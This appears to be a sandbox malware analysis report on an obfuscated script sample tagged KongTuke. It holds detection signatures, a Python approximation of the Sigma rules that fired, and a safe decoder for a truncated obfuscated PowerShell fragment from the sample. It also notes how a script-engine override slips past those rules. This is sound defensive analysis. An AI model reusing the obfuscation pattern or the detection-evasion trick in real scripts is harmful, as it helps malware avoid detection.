
Windows Analysis Report
download.js

Overview

General Information

Sample name: download.js
Analysis ID: 1559078
MD5: 397a3ddda7003366c39e5f067e8a41e0
SHA1: 85aa408bf461f458215b5dd31b6ba90ec11c6601
SHA256: e529690779cf0abb982b45619666dd0bbe61e2c7abbae38844c3398540348a5c
Tags: js, KongTuke, user-monitorsg

Detection

Score: 22
Range: 0 - 100
Whitelisted: false
Confidence: 80%

Signatures

Sigma detected: WScript or CScript Dropper
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 6716 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

Sigma detected: WScript or CScript Dropper
  Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
  Source: Process started
  Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine|base64offset|contains: (empty), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: (empty), ParentImage: (empty), ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", ProcessId: 6716, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
  Author: Michael Haag
  Source: Process started
  Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine|base64offset|contains: (empty), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: (empty), ParentImage: (empty), ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", ProcessId: 6716, ProcessName: wscript.exe

No Suricata rule has matched
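Both Sigma matches above key on the same process-creation event. As an added example (not the published rule text: the matching logic below is an approximation modelled on the rules' titles and on the event fields the report shows), the following Python runs that logic over constructed process events, including the one from this report, and shows two practical limits a detection engineer should know: the `.js` substring test fires on any command line containing it, and a script launched through the host's engine override (`//E:JScript` on a file without a script extension) leaves nothing for an extension-based rule to match. The parent-process fields are empty in this report's event data, so no parent-based tuning is possible from it.

```python
"""Approximate re-implementation of the two Sigma rules that fired in this
report, evaluated over constructed process-creation events.

This is an added example, not the rules' published text.  The image-name
suffixes, user-writable path prefixes and script extensions are assumptions
chosen to reproduce the rules' intent; tune them against the real YAML."""
from dataclasses import dataclass

SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe")
# NOTE: plain substring tests, as in the rules; ".js" also hits ".json" and
# any path segment containing ".js" (known false-positive source).
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".vba", ".wsf")
USER_WRITABLE = (":\\users\\", ":\\programdata\\")


@dataclass
class ProcEvent:
    """Minimal Sysmon EID 1 / Security 4688 style event."""
    image: str
    command_line: str
    parent_image: str = ""      # empty in this report's Sigma event data


def _script_host_with_script(ev: ProcEvent) -> bool:
    img, cmd = ev.image.lower(), ev.command_line.lower()
    return img.endswith(SCRIPT_HOSTS) and any(ext in cmd for ext in SCRIPT_EXTS)


def rule_script_exec(ev: ProcEvent) -> bool:
    """WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript (approximation):
    a script host whose command line names a script file."""
    return _script_host_with_script(ev)


def rule_dropper(ev: ProcEvent) -> bool:
    """WScript or CScript Dropper (approximation): same as above, but the
    script lives under a user-writable location."""
    return _script_host_with_script(ev) and any(
        p in ev.command_line.lower() for p in USER_WRITABLE)


RULES = {
    "WScript or CScript Dropper": rule_dropper,
    "WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript": rule_script_exec,
}


def evaluate(events):
    """Map each event's command line to the list of rule titles it matches."""
    return {ev.command_line: [name for name, fn in RULES.items() if fn(ev)]
            for ev in events}


# Constructed events.  The first one is the report's own process.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js"'),
    # Benign admin use of a script host from a system path: exec rule only.
    ProcEvent(r"C:\Windows\System32\cscript.exe",
              r"C:\Windows\System32\cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dlv",
              r"C:\Windows\System32\cmd.exe"),
    # Same file opened in an editor: no script host, no match.
    ProcEvent(r"C:\Windows\System32\notepad.exe",
              r'C:\Windows\System32\notepad.exe "C:\Users\user\Desktop\download.js"',
              r"C:\Windows\explorer.exe"),
    # Engine override on a .txt file: script host, user-writable path, but no
    # script extension on the command line, so neither rule fires.
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\wscript.exe //E:JScript C:\ProgramData\update.txt"),
]

if __name__ == "__main__":
    for cmd, hits in evaluate(SAMPLE_EVENTS).items():
        print(f"{cmd}\n    -> {hits or 'no match'}")
```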

Source: download.js | Initial sample: Strings found which are bigger than 50
Source: classification engine | Classification label: sus22.winJS@1/0@0/0
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policies lookup)
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll (3 times)
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 (the JScript script engine: the .js extension dispatched the file to JScript)
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (2 times)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (a count marks a technique matched by signatures; the other entries are the matrix's placeholder cells)

Reconnaissance: Gather Victim Identity Information; Credentials
Resource Development: Scripting (2); Domains
Initial Access: Valid Accounts; Default Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job
Persistence: Scripting (2); DLL Side-Loading (1)
Privilege Escalation: DLL Side-Loading (1); Boot or Logon Initialization Scripts
Defense Evasion: DLL Side-Loading (1); Obfuscated Files or Information (1)
Credential Access: OS Credential Dumping; LSASS Memory
Discovery: System Information Discovery (2); Application Window Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol
Collection: Data from Local System; Data from Removable Media
Command and Control: Data Obfuscation; Junk Data
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth
Impact: Abuse Accessibility Features; Network Denial of Service
Source | Detection | Scanner | Label | Link
download.js | 3% | ReversingLabs | | 
No Antivirus matches (dropped files, unpacked PE files, domains, URLs)
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
No contacted IP infos

Note: the report records no DNS query from the sample's process ("DNS query: no activity detected"), and the same phicdn.net host and IP recur in the context table for unrelated samples, so treat this resolution as sandbox background traffic rather than an indicator for download.js.
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559078
Start date and time: 2024-11-20 06:58:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.js
Detection: SUS
Classification: sus22.winJS@1/0@0/0
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .js
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
  • Excluded IPs from analysis (whitelisted): 93.184.221.240, 4.245.163.56, 13.95.31.18
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
No simulations
No context

Match: fp2e7a.wpc.phicdn.net (context: 192.229.221.95)
  Associated Sample Name / URL | Detection | Threat Name
  file.exe | malicious | LummaC
  6GvQSVIEIu.exe | malicious | Unknown
  NW_EmployerNewsletter_11142024_pdf.html | malicious | Unknown
  gggghh.exe | malicious | FormBook
  file.exe | malicious | Remcos
  https://www.amtso.org/check-desktop-phishing-page/ | malicious | Unknown
  FACTURA 4377.exe | malicious | Unknown
  WEqMZ4qrbX.dll | malicious | Unknown
  exe005(1).exe | malicious | Berbew
  exe002(1).exe | malicious | Berbew

No context
No created / dropped files found

File type: ASCII text, with very long lines (12272), with CRLF line terminators
Entropy (8bit): 6.014135356739472
TrID: (none)
File name: download.js
File size: 21'123 bytes
MD5: 397a3ddda7003366c39e5f067e8a41e0
SHA1: 85aa408bf461f458215b5dd31b6ba90ec11c6601
SHA256: e529690779cf0abb982b45619666dd0bbe61e2c7abbae38844c3398540348a5c
SHA512: 5bc76790f0f2e3baacf8e536e7eab9b1ddee0225d757d283b5b371bb64ddc44247c8c3e180f3c9de8420ab677054d995fb11af9f332dab6b888ae49cb6e5032c
SSDEEP: 384:auFX8s5e5w6zzyocuNHvPBJIFpww5gXV27MH7Wkc/bKj6:aY8KoculPIvwwiXV24b2T3
TLSH: DC929EE5B740ECD2529DC77F861A3C0D37A8957DD0965FC4B2A4C2C1BB517406EA8C91
File Content Preview: $hyzpculnkf=$executioncontext;$eresatanesanreenesinreberebeinatedores = (-jOiN (@((9516-(7933+1530)),(-5891+5943),(6508-(5625+826)),(81500/1630),(9699-(11874-(8388-6157))),(-3429+(450+3033)),(333-(-2974+3251)),(7088-(37246768/(556080/105))),(-4866+(14034-
Icon Hash: 68d69b8bb6aa9a86
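The File Content Preview is PowerShell, not JScript: `$executioncontext`, `-jOiN` and the `@( ... )` array literal are PowerShell syntax, and each array element is an arithmetic expression that evaluates to one character code. As an added example (not part of the report), the Python below decodes that pattern without executing any of the script. SAMPLE is the preview copied from the report, including its truncation; the eight complete expressions evaluate to 53, 52, 57, 50, 56, 54, 56, 55, i.e. the digit string 54928687, so this layer yields another encoded string that the preview does not show. The evaluator accepts only integer arithmetic, so a sample cannot smuggle a call or variable reference through it. One inference, not a finding of the report: a PowerShell body dispatched to the JScript engine by wscript.exe would fail at parse time, which is consistent with the single-process tree, the "idle" signature, and the absence of dropped files, registry values and network activity.

```python
"""Decoder for the PowerShell char-code obfuscation seen in the file content
preview: '@( (expr), (expr), ... )' holds integer arithmetic; PowerShell casts
each value to [char] and -joins the result.

Added example, not part of the report.  SAMPLE is constructed from the
report's preview text, cut off exactly where the report cuts it off; the
parser decodes every complete element and returns the unfinished tail."""
import ast
import operator

SAMPLE = (
    "$hyzpculnkf=$executioncontext;$eresatanesanreenesinreberebeinatedores = "
    "(-jOiN (@((9516-(7933+1530)),(-5891+5943),(6508-(5625+826)),(81500/1630),"
    "(9699-(11874-(8388-6157))),(-3429+(450+3033)),(333-(-2974+3251)),"
    "(7088-(37246768/(556080/105))),(-4866+(14034-"
)

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def safe_eval(expr: str) -> int:
    """Evaluate integer arithmetic only: constants, + - * / and unary minus.
    Names, calls, attributes and anything else raise ValueError, so the
    obfuscated text is never executed as code."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        raise ValueError(f"disallowed syntax: {ast.dump(node)}")

    value = walk(ast.parse(expr, mode="eval"))
    if value != int(value):            # PowerShell '/' yields a double; demand an exact code
        raise ValueError(f"non-integer char code {value!r} from {expr!r}")
    return int(value)


def split_array(text: str):
    """Split the first '@( ... )' array in text into its top-level elements.
    Returns (complete_elements, leftover): leftover is the text of a final
    element whose parentheses never closed (a truncated fragment), or '' when
    the array closed cleanly."""
    start = text.index("@(") + 2
    elems, cur, depth = [], [], 0

    def flush():
        elem = "".join(cur).strip()
        if elem:
            elems.append(elem)
        cur.clear()

    for ch in text[start:]:
        if ch == ")" and depth == 0:       # the ')' that closes '@(' itself
            flush()
            return elems, ""
        if ch == "," and depth == 0:       # element boundary
            flush()
            continue
        depth += (ch == "(") - (ch == ")")
        cur.append(ch)
    return elems, "".join(cur).strip()     # text ended mid-element


def decode(text: str):
    """Decode the char-code array in text.
    Returns (decoded_string, leftover_fragment)."""
    elems, leftover = split_array(text)
    return "".join(chr(safe_eval(e)) for e in elems), leftover


if __name__ == "__main__":
    decoded, rest = decode(SAMPLE)
    print("decoded so far :", decoded)     # 54928687
    print("truncated tail :", rest)        # (-4866+(14034-
```

The decoded digits are the output of this layer only; what the script does with the digit string is not visible in the preview and is not guessed here.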
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 06:59:08.843539953 CET | 1.1.1.1 | 192.168.2.5 | 0x1eb6 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 06:59:08.843539953 CET | 1.1.1.1 | 192.168.2.5 | 0x1eb6 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false


Target ID: 0
Start time: 00:59:11
Start date: 20/11/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js"
Imagebase: 0x7ff6078b0000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

      No disassembly